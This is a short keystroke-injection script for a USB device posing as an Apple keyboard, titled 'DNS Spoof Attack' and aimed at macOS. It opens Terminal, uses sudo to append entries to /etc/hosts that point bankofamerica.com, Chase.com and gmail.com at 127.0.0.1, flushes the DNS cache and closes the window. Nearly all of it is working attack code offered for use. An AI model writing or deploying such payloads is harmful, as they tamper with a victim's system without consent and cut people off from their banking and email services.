REM Author: Generated
REM Title: DNS Spoof Attack
REM Target: macOS
REM Version: 1.0
REM Category: Network-Attacks
REM ---
DELAY 1000
REM DNS spoof - add entries to /etc/hosts
REM ID 05ac:021e Apple:Keyboard
DELAY 1000
GUI SPACE
DELAY 500
STRING terminal
DELAY 500
ENTER
DELAY 1000
STRING echo '127.0.0.1 bankofamerica.com' | sudo tee -a /etc/hosts
ENTER
DELAY 500
STRING echo '127.0.0.1 Chase.com' | sudo tee -a /etc/hosts
ENTER
DELAY 500
STRING echo '127.0.0.1 gmail.com' | sudo tee -a /etc/hosts
ENTER
DELAY 500
STRING dscacheutil -flushcache
ENTER
DELAY 500
STRING echo 'DNS spoof entries added'
ENTER
DELAY 500
GUI w
